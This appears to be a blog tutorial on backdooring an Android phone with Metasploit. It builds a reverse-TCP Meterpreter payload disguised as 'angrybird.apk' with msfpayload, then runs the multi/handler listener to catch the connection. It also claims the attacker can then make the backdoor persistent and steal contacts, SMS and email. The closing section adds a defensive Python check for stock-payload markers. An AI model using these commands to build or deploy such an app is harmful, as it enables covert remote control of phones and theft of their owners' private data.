HACKING ANDROID DEVICE USING METASPLOIT BACKDOORS
- shubham kanara
- May 8, 2015
INTRODUCTION
Metasploit is an open-source penetration testing tool with a range of functionality. The Metasploit Project provides information about security vulnerabilities and supports penetration testing, developing and running exploits against remote machines, and IPS/IDS signature development.
Note: In this tutorial I use my Gionee M2. This backdoor will work on all Android OSes irrespective of their customisation.
SETUP INFORMATION
192.168.0.3 victim IP address (Gionee M2)
192.168.0.5 attacker's IP address (Metasploit)
As this is a demo, I am using Google Drive to download the Metasploit backdoor (malicious app).
CREATE BACKDOOR
Use Kali Linux with the Metasploit Framework installed to generate the payload.
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=4488 R > angrybird.apk
- msfpayload: Metasploit command to create a payload (exe, apk, java etc.)
- LHOST (local host): attacker's IP address for the victim to connect back to
- LPORT (local port): port for the victim to connect back to
- R: msfpayload parameter that indicates generation of a raw payload


Successful execution of msfpayload creates the angrybird.apk app, which is a Metasploit reverse TCP backdoor. When the app is installed on any Android device, it connects back to the attacker's IP address (192.168.0.5 here). Before the app is installed on the device, the attacker needs to run the following Metasploit commands so that the victim's device can successfully connect back to the attacker's machine.
msfconsole

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <attackers_ip_address>
set LPORT <connect_back_port>
exploit

When the malicious APK runs on the target device, Metasploit's Meterpreter shell opens. For Meterpreter command help, type 'help' at the Meterpreter prompt.

Once the user is compromised we can escalate our privileges, make the backdoor persistent, and steal contacts, SMS, email etc.
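From the defender's side, an APK like angrybird.apk can be screened before it is sideloaded. The following Python check is an added example, not part of the original tutorial: it assumes an unmodified payload whose classes sit under the com.metasploit.stage package, and the function names and sample archives are constructed for illustration.

```python
import io
import zipfile

# Assumption: an unmodified Metasploit Android payload keeps its classes under
# the com.metasploit.stage package; a repackaged or obfuscated build will not.
STAGE_MARKER = b"com/metasploit/stage"
# Permissions matching the data the tutorial says can be taken (contacts, SMS).
RISKY_PERMISSIONS = ("android.permission.READ_SMS",
                     "android.permission.READ_CONTACTS")


def inspect_apk(apk_bytes):
    """Return (has_stage_marker, sorted list of risky permissions found)."""
    has_marker = False
    found = set()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        for name in apk.namelist():
            data = apk.read(name)
            if name.startswith("classes") and name.endswith(".dex"):
                has_marker = has_marker or STAGE_MARKER in data
            elif name == "AndroidManifest.xml":
                # Compiled manifests store strings as UTF-16LE or UTF-8.
                for perm in RISKY_PERMISSIONS:
                    if perm.encode("utf-16-le") in data or perm.encode() in data:
                        found.add(perm)
    return has_marker, sorted(found)


def build_sample_apk(dex, manifest):
    """Build a constructed, non-functional APK-shaped zip for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", dex)
        z.writestr("AndroidManifest.xml", manifest)
    return buf.getvalue()


# Constructed samples: placeholder bytes, not real DEX or manifest content.
SUSPECT = build_sample_apk(
    b"dex\n035\x00Lcom/metasploit/stage/Payload;",
    "android.permission.READ_SMS".encode("utf-16-le"))
BENIGN = build_sample_apk(b"dex\n035\x00Lcom/example/game/Main;", b"")

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, inspect_apk(sample))
```

A hit on the stage marker is strong evidence of a stock payload; the absence of one proves nothing, so the permission list should still be compared with what the app claims to do.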